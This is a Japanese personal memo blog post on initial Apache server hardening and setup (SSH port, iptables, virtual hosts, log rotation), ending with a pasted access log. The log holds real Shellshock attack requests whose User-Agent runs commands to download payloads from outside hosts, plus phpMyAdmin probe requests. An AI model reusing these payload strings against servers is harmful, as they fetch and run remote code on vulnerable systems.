読者です 読者をやめる 読者になる 読者になる

自分用めも

初心者ちっくなプログラムネタを中心に、自分用の覚え書きをメモっていくための場所です。

Apacheの初期設定 覚え書き

(1)SSHのポートを変更する

vim /etc/ssh/sshd_config

PermitRootLogin no         #rootの直ログイン禁止
Port 0000                  #SSHのポート変更

(2)接続制限

vim /etc/sysconfig/iptables

# accept SSH, HTTP, HTTPS
-A INPUT -p tcp -m state --syn --state NEW --dport 0000 #以下略

参考:
「Webサーバーを構築しよう(1)」~初心者でもよくわかる!VPSによるWebサーバー構築講座(3) - さくらのナレッジ

(3)バーチャルホスト設定
※DocumentRootは、/srv/httpd/xxx/にそれぞれ作成

vim /etc/httpd/conf/httpd.conf

Include /srv/httpd/apache.conf

vim /srv/httpd/apache.conf

Include /srv/httpd/hoge/apache.conf
Include /srv/httpd/fuga/apache.conf
Include /srv/httpd/hage/apache.conf

apachectl configtest
apachectl graceful

参考:
仕事で使える魔法のLAMP(23):設定ファイルや公開ドキュメントの配置を考える - @IT

(4)ログ設定(日次ローテート)
vim /srv/httpd/hoge/apache.conf

CustomLog "|/usr/sbin/rotatelogs /srv/httpd/hoge/logs/access%Y%m%d.log 86400 540" combined
ErrorLog "|/usr/sbin/rotatelogs /srv/httpd/hoge/logs/error%Y%m%d.log 86400 540"

参考:
Apacheのログ設定まとめ - 波打際のブログさん



一日後のアクセスログ

195.22.104.168 - - [03/May/2015:03:58:36 +0900] "GET /cgi-bin/php5 HTTP/1.1" 404 288 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http//luxsocks.ru ; wget https://luxsocks.ru --no-check-certificate ; curl http//luxsocks.ru// ; curl -k https://luxsocks.ru ; lwp-download http://luxsocks.ru ; GET http://luxsocks.ru ; lynx http://luxsocks.ru ; wget http://174.122.42.230/luxx ; curl http://174.122.42.230/luxx ; fetch http://174.122.42.230/luxx ; lwp-download http://174.122.42.230/luxx ; GET http://174.122.42.230/luxx ; lynx http://174.122.42.230/luxx\");'"
195.22.104.168 - - [03/May/2015:03:58:36 +0900] "GET /cgi-bin/php5-cli HTTP/1.1" 404 292 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http//luxsocks.ru ; wget https://luxsocks.ru --no-check-certificate ; curl http//luxsocks.ru// ; curl -k https://luxsocks.ru ; lwp-download http://luxsocks.ru ; GET http://luxsocks.ru ; lynx http://luxsocks.ru ; wget http://174.122.42.230/luxx ; curl http://174.122.42.230/luxx ; fetch http://174.122.42.230/luxx ; lwp-download http://174.122.42.230/luxx ; GET http://174.122.42.230/luxx ; lynx http://174.122.42.230/luxx\");'"
195.22.104.168 - - [03/May/2015:03:58:36 +0900] "GET /phppath/php HTTP/1.1" 404 287 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http//luxsocks.ru ; wget https://luxsocks.ru --no-check-certificate ; curl http//luxsocks.ru// ; curl -k https://luxsocks.ru ; lwp-download http://luxsocks.ru ; GET http://luxsocks.ru ; lynx http://luxsocks.ru ; wget http://174.122.42.230/luxx ; curl http://174.122.42.230/luxx ; fetch http://174.122.42.230/luxx ; lwp-download http://174.122.42.230/luxx ; GET http://174.122.42.230/luxx ; lynx http://174.122.42.230/luxx\");'"
1.214.119.227 - - [03/May/2015:06:48:55 +0900] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 304 "-" "-"
1.214.119.227 - - [03/May/2015:06:48:55 +0900] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 304 "-" "-"
1.214.119.227 - - [03/May/2015:06:48:55 +0900] "GET //pma/scripts/setup.php HTTP/1.1" 404 297 "-" "-"
1.214.119.227 - - [03/May/2015:06:48:56 +0900] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
1.214.119.227 - - [03/May/2015:06:48:56 +0900] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 301 "-" "-"

怖い。。